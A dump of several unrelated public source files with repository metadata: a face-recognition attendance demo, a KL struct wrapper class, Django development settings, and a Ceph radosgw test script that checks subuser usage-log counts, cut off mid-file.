"hharwinderkaur@unomaha.edu"
] | hharwinderkaur@unomaha.edu |
f64a006d037948ac99c6973eceedbf33367de8e5 | 87716f71b04a28f9e7828193b701a617f54959ba | /Android-All researched document and past demo required by client - not used/Python demo/Capstone_Face.py | 1a8e2f6ab51b8e29b4b943447bbaa171cf9ab66b | [
"Apache-2.0"
] | permissive | CanTri/CheckingAttendent | 935b5b37df074c83313a400be36268cf79ff30e2 | d3f946cc435de3b45952b287664750bebac5f55d | refs/heads/master | 2021-03-21T23:56:58.914605 | 2018-04-20T15:13:15 | 2018-04-20T15:13:15 | 109,378,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | import face_recognition
import cv2
import copy
class Face:
def __init__(self,person,file):
image = face_recognition.load_image_file(file)
self.encoding = face_recognition.face_encodings(image)[0]
self.person = person
self.file = file
def nothing(x):
pass
#obama_image = face_recognition.load_image_file("obama.jpg")
#obama_face_encoding = face_recognition.face_encodings(obama_image)[0]
#a = Face("Obama","obama.jpg")
#hiep_image = face_recognition.load_image_file("TungHiep.jpg")
#hiep_face_encoding = face_recognition.face_encodings(hiep_image)[0]
#b = Face("Hiep","TungHiep.jpg")
# Initialize some variables
face_locations = []
face_encodings = []
check_face_encodings =[]
face_names = []
process_this_frame = True
check_face_encodings.append(Face("Obama","obama.jpg"))
check_face_encodings.append(Face("Hiep","TungHiep.jpg"))
check_face_encodings.append(Face("America","chris.jpg"))
check_face_encodings.append(Face("Hawk","hawk.jpg"))
check_face_encodings.append(Face("Hulk","hulk.jpg"))
check_face_encodings.append(Face("Iron","iron.jpg"))
check_face_encodings.append(Face("Widow","widow.jpg"))
check_face_encodings.append(Face("Tam","Tam.jpg"))
check_face_encodings.append(Face("Khoi","Khoi.jpg"))
check_face_encodings.append(Face("Tri","Tri.jpg"))
# Grab a single frame of video
frame = cv2.imread(raw_input("Input file name: "))
if frame is None:
webcam = cv2.VideoCapture(0)
while True:
s, frame = webcam.read()
cv2.imshow('Video', frame)
if cv2.waitKey(1) != -1:
#cv2.imwrite("testing.jpg",frame)
break
myimage = copy.deepcopy(frame)
cv2.namedWindow("Video",cv2.WINDOW_NORMAL)
cv2.createTrackbar("Correctness", "Video", 0, 9,nothing)
cv2.createTrackbar("Small Face", "Video", 0, 5,nothing)
temp = -1
temp2 = -1
while True:
value = (cv2.getTrackbarPos("Correctness", "Video"))/10.0
if (value == 0):
value = 0.1
face_value = cv2.getTrackbarPos("Small Face", "Video")
if (face_value == 0):
face_value = 1
if ((value != temp and value > 0) or (face_value != temp2 and face_value > 0)):
frame = copy.deepcopy(myimage)
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
face_locations = face_recognition.face_locations(small_frame,face_value)
print "Face detected at location: " + str(face_locations)
face_encodings = face_recognition.face_encodings(small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
print ("------Checking------")
name = "Unknown"
for i in range(len(check_face_encodings)):
match = face_recognition.compare_faces([check_face_encodings[i].encoding], face_encoding,value)
if match[0]:
name = check_face_encodings[i].person
print "Checking with " + check_face_encodings[i].person + " Result: " + str(match)
face_names.append(name)
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
top *= 4
right *= 4
bottom *= 4
left *= 4
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
temp = value
temp2 = face_value
cv2.imshow("Video", frame)
if cv2.waitKey(1) == 27: # press ESC to close window
cv2.destroyAllWindows()
break
cv2.waitKey(0)
# Release handle to the webcam
cv2.destroyAllWindows()
| [
"tbthiep@apcs.vn"
] | tbthiep@apcs.vn |
e2749e0d9cb867ef80f5ae4149656804e1cad032 | d17cb92b16c2cf32d6d8a69867a352052d87910d | /PYModules/GorGon/KLWrapper/KLStruct.py | 897a56e8ae0baaa8d6f288d60f583bc7e55624de | [] | no_license | sbertout/GorGon | cd420babe3f63eccc63819e83c7d0d1229069b15 | cf95dfc5375de251cf859d96eb44bb2d8375f592 | refs/heads/master | 2021-01-21T13:57:13.289976 | 2017-08-04T23:07:35 | 2017-08-04T23:07:35 | 91,816,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,800 | py | from KLFunction import KLFunction
from KLMember import KLMember
class KLStruct:
def __init__(self, name, members=None):
self.__name = name
self.__members = []
if members is not None:
self.setMembers(members)
self.__constructors = []
self.__hasDestructor = False
self.__parents = []
self.__getters = []
self.__setters = []
self.__methods = []
self.__operators = []
def getName(self):
return self.__name
def _setHasDestructor(self, b):
self.__hasDestructor = b
def getHasDestructor(self):
return self.__hasDestructor
def getConstructorCount(self):
return len(self.__constructors)
def _addConstructor(self, constructor):
self.__constructors.append(constructor)
def getConstructor(self, idx):
return self.__constructors[idx]
def _setMembers(self, members):
for m in members:
self.__members.append(KLMember(m['access'], m['baseType'], m['memberDecls'][0]['name']))
def getMemberCount(self):
return len(self.__members)
def getMember(self, idx):
return self.__members[idx]
def getGetterCount(self):
return len(self.__getters)
def getSetterCount(self):
return len(self.__setters)
def _addGetter(self, methodName, returnType, access):
self.__getters.append(KLFunction(methodName, returnType=returnType, access=access))
def getGetter(self, idx):
return self.__getters[idx]
def _addSetter(self, methodName, params, access):
setterFunc = KLFunction(methodName, access=access)
setterFunc._addParams(params)
self.__setters.append(setterFunc)
def getSetter(self, idx):
return self.__setters[idx]
def getMethodCount(self):
return len(self.__methods)
def _addMethod(self, methodName, returnType, params, access):
methodFunc = KLFunction(methodName, returnType=returnType, access=access)
methodFunc._addParams(params)
self.__methods.append(methodFunc)
def getMethod(self, idx):
return self.__methods[idx]
def getOperatorCount(self):
return len(self.__operators)
def _addOperator(self, operatorName, params, access):
operatorFunc = KLFunction(operatorName, access=access)
operatorFunc._addParams(params)
self.__operators.append(operatorFunc)
def getOperator(self, idx):
return self.__operators[idx]
def _setParents(self, parentsAndInterfaces):
self.__parents = parentsAndInterfaces
def _getParents(self):
return self.__parents
def getParentsCount(self):
return len(self.__parents)
def getParent(self, idx):
return self.__parents[idx]
| [
"sbertout@gmail.com"
] | sbertout@gmail.com |
5202d463d31de81cbb64c1e559dfe2024235644d | 5db0c193e6de720b199c2736c70911aca7fe35c5 | /archiver1/settings.py | c6e25c5c7f9a31adf83fa074f20c8c8304fc094b | [] | no_license | cheslip/archiver-py | 5926cd1e2d3fe1ce129896b599220da20ae25b7e | 13cf49d1420b4edc5ad816c5f52f7f92971fe1b9 | refs/heads/master | 2021-01-01T06:55:30.285580 | 2012-08-02T06:42:47 | 2012-08-02T06:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,360 | py | # Django settings for archiver1 project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'archiver', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'root', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = None
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'tcc^*$c9w^xc3lr7gcw%skli6$$i-^-fy#(nq!em6w758o^kj8'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'archiver1.urls'
LOGIN_URL = '/login/'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'archiver1.wsgi.application'
TEMPLATE_DIRS = ('templates',)
AUTH_PROFILE_MODULE = 'employee.Employee'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'reversion',
'accounts',
'boxes',
'employee',
)
SESSION_COOKIE_AGE = 172800
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| [
"cheslip@mac.com"
] | cheslip@mac.com |
dd1444d5ca080d334504e7dd0362c639af1c7e2c | d9b02979df31f64cd6683a522fe0eb5d51f876b2 | /auto_test.py | b2450078abd0854b21f6eb2b5192051879f918e7 | [] | no_license | ZVampirEM77/SubuserAutoTest | a5f58b6b736d3c1ec67d317b76310db207add034 | 28bdc0f1a22d23c024653201fb59bd7f7ed0218b | refs/heads/master | 2020-12-03T07:55:38.151064 | 2017-07-03T05:59:14 | 2017-07-03T05:59:14 | 95,639,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153,317 | py | '''
By Enming Zhang
Email: enming.zhang@umcloud.com
2017-06-27
'''
import sys, os, json
import time
import argparse
import subprocess
ceph_version = '<K'
ceph_path = "/home/zvampirem/subuser/ceph/src/"
py_dir = os.getcwd()
def exec_command(command):
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p.communicate()
def exec_command_with_return(command):
return subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout
def ok_display(content):
return "[\033[1;;32m%s\033[0m]" % (content)
def fail_display(content):
return "[\033[1;;41m%s\033[0m]" % (content)
def get_user_name(user_dic):
user_name = ""
if "subuser" in user_dic:
user_name = user_dic["user"] + ":" + user_dic["subuser"]
else:
user_name = user_dic["user"]
return user_name
def parse_response_content(res_content):
user_dict = {}
for user_info in res_content["entries"]:
user = get_user_name(user_info)
user_dict[user] = {}
for bucket in user_info["buckets"]:
user_dict[user][bucket["bucket"]] = {}
user_dict[user][bucket["bucket"]]["categories"] = {}
for category in bucket["categories"]:
user_dict[user][bucket["bucket"]]["categories"][category["category"]] = {}
user_dict[user][bucket["bucket"]]["categories"][category["category"]]["ops"] = category["ops"]
user_dict[user][bucket["bucket"]]["categories"][category["category"]]["successful_ops"] = category["successful_ops"]
return user_dict
def verify_show_response_msg(req_command, expect_dict):
usage_log = exec_command_with_return(req_command)
data = json.load(usage_log)
result = True
user_dict = {}
if len(data["entries"]) == expect_dict["entries_size"] and len(data["summary"]) == expect_dict["entries_size"]:
if len(data["entries"]) != 0:
user_dict = parse_response_content(data)
for user_info in data["entries"]:
user = get_user_name(user_info)
if user_dict[user] != expect_dict[user]:
print data
print '---------------------'
print user_dict[user]
print '+++++++++++++++++++++'
print expect_dict
result = False
else:
result = True
else:
print data
result = False
return result
def exec_based_on_version(command):
req_command = ''
if ceph_version == '>=K':
req_command = './bin/' + command
else:
req_command = './' + command
exec_command(req_command)
def verify_show_based_on_version(command, expect_dict):
req_command = ''
if ceph_version == '>=K':
req_command = './bin/' + command
else:
req_command = './' + command
return verify_show_response_msg(req_command, expect_dict)
class TestCase1(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def run(self):
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
self.prepare()
result1 = result2 = result3 = False
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase1 %s" % (ok_display("OK"))
else:
print "testcase1 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c subuser2.s3cfg rb s3://test2')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
class TestCase2(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c subuser1.s3cfg mb s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser2.s3cfg put user1.s3cfg s3://test1')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user1.s3cfg put subuser1.s3cfg s3://test1')
time.sleep(30)
def run(self):
result1 = result2 = result3 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
os.chdir(py_dir)
if result1 == result2 ==result3 == True:
self.op3()
expect_dict6 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict7 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict6)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict7)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict8)
os.chdir(py_dir)
if result1 == result2 ==result3 == True:
print "testcase2 %s" % (ok_display("OK"))
else:
print "testcase2 %s" % (fail_display("FAIL"))
else:
print "testcase2 %s" % (fail_display("FAIL"))
else:
print "testcase2 %s" % (fail_display("FAIL"))
class TestCase3(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg get s3://test1/user1.s3cfg 3-1.txt')
exec_command('s3cmd -c user1.s3cfg get s3://test1/subuser1.s3cfg 3-2.txt')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg get s3://test1/user1.s3cfg 3-3.txt')
exec_command('s3cmd -c subuser1.s3cfg get s3://test1/subuser1.s3cfg 3-4.txt')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser2.s3cfg get s3://test1/user1.s3cfg 3-5.txt')
exec_command('s3cmd -c subuser2.s3cfg get s3://test1/subuser1.s3cfg 3-6.txt')
time.sleep(30)
def run(self):
result1 = result2 = result3 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 4, "successful_ops": 4}}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 ==result3 == True:
self.op3()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 6, "successful_ops": 6}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 ==result3 == True:
print "testcase3 %s" % (ok_display("OK"))
else:
print "testcase3 %s" % (fail_display("FAIL"))
else:
print "testcase3 %s" % (fail_display("FAIL"))
else:
print "testcase3 %s" % (fail_display("FAIL"))
class TestCase4(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg del s3://test1/subuser1.s3cfg')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser2.s3cfg del s3://test1/user1.s3cfg')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1')
time.sleep(30)
def run(self):
result1 = result2 = result3 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 6, "successful_ops": 6},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 6, "successful_ops": 6},
"delete_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 6, "successful_ops": 6},
"delete_obj": {"ops": 2, "successful_ops": 2},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 ==result3 == True:
print "testcase4 %s" % (ok_display("OK"))
else:
print "testcase4 %s" % (fail_display("FAIL"))
else:
print "testcase4 %s" % (fail_display("FAIL"))
else:
print "testcase4 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
exec_command('rm 3*.txt')
class TestCase5(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c subuser1.s3cfg mb s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test2')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test3')
exec_command('s3cmd -c user1.s3cfg put subuser1.s3cfg s3://test3')
time.sleep(30)
def run(self):
result1 = result2 = result3 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 0}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
